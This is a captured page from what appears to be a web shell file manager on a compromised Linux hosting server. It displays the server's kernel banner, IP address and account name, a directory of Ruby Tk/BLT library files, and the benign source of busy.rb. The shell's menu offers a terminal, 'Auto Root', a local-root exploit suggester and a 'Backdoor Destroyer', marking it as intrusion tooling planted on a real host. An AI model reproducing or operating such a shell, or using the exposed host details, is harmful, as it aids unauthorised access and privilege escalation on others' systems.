Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby21 /
lib64 /
ruby /
2.1.0 /
tkextlib /
blt /
Delete
Unzip
Name
Size
Permission
Date
Action
tile
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
barchart.rb
1.75
KB
-rw-r--r--
2023-07-26 17:52
bitmap.rb
2.48
KB
-rw-r--r--
2023-07-26 17:52
busy.rb
1.69
KB
-rw-r--r--
2023-07-26 17:52
component.rb
59.75
KB
-rw-r--r--
2023-07-26 17:52
container.rb
640
B
-rw-r--r--
2023-07-26 17:52
cutbuffer.rb
520
B
-rw-r--r--
2023-07-26 17:52
dragdrop.rb
6.61
KB
-rw-r--r--
2023-07-26 17:52
eps.rb
723
B
-rw-r--r--
2023-07-26 17:52
graph.rb
1.49
KB
-rw-r--r--
2023-07-26 17:52
htext.rb
2.58
KB
-rw-r--r--
2023-07-26 17:52
setup.rb
316
B
-rw-r--r--
2023-07-26 17:52
spline.rb
464
B
-rw-r--r--
2023-07-26 17:52
stripchart.rb
1.65
KB
-rw-r--r--
2023-07-26 17:52
table.rb
9.59
KB
-rw-r--r--
2023-07-26 17:52
tabnotebook.rb
2.88
KB
-rw-r--r--
2023-07-26 17:52
tabset.rb
12.23
KB
-rw-r--r--
2023-07-26 17:52
ted.rb
1.6
KB
-rw-r--r--
2023-07-26 17:52
tile.rb
904
B
-rw-r--r--
2023-07-26 17:52
tree.rb
26.54
KB
-rw-r--r--
2023-07-26 17:52
treeview.rb
27.82
KB
-rw-r--r--
2023-07-26 17:52
unix_dnd.rb
3.93
KB
-rw-r--r--
2023-07-26 17:52
vector.rb
4.89
KB
-rw-r--r--
2023-07-26 17:52
watch.rb
3.6
KB
-rw-r--r--
2023-07-26 17:52
win_printer.rb
1.27
KB
-rw-r--r--
2023-07-26 17:52
winop.rb
2.65
KB
-rw-r--r--
2023-07-26 17:52
Save
Rename
# # tkextlib/blt/busy.rb # by Hidetoshi NAGAI (nagai@ai.kyutech.ac.jp) # require 'tk' require 'tk/itemconfig.rb' require 'tkextlib/blt.rb' module Tk::BLT module Busy extend TkCore extend TkItemConfigMethod TkCommandNames = ['::blt::busy'.freeze].freeze ########################### class Shield < TkWindow def self.shield_path(win) win = window(win) unless win.kind_of?(TkWindow) if win.kind_of?(Tk::Toplevel) win.path + '._Busy' else win.path + '_Busy' end end def initialize(win) @path = self.class.shield_path(win) end end def self.shield_path(win) Tk::BLT::Busy::Shield.shield_path(win) end end end class << Tk::BLT::Busy def __item_config_cmd(win) ['::blt::busy', 'configure', win] end private :__item_config_cmd undef itemcget undef itemcget_tkstring alias configure itemconfigure alias configinfo itemconfiginfo alias current_configinfo current_itemconfiginfo private :itemconfigure, :itemconfiginfo, :current_itemconfiginfo ################################## def hold(win, keys={}) tk_call('::blt::busy', 'hold', win, *hash_kv(keys)) end def release(*wins) tk_call('::blt::busy', 'release', *wins) end def forget(*wins) tk_call('::blt::busy', 'forget', *wins) end def is_busy(pat=None) tk_split_list(tk_call('::blt::busy', 'isbusy', pat)) end def names(pat=None) tk_split_list(tk_call('::blt::busy', 'names', pat)) end alias windows names def check(win) bool(tk_call('::blt::busy', 'check', win)) end def status(win) bool(tk_call('::blt::busy', 'status', win)) end end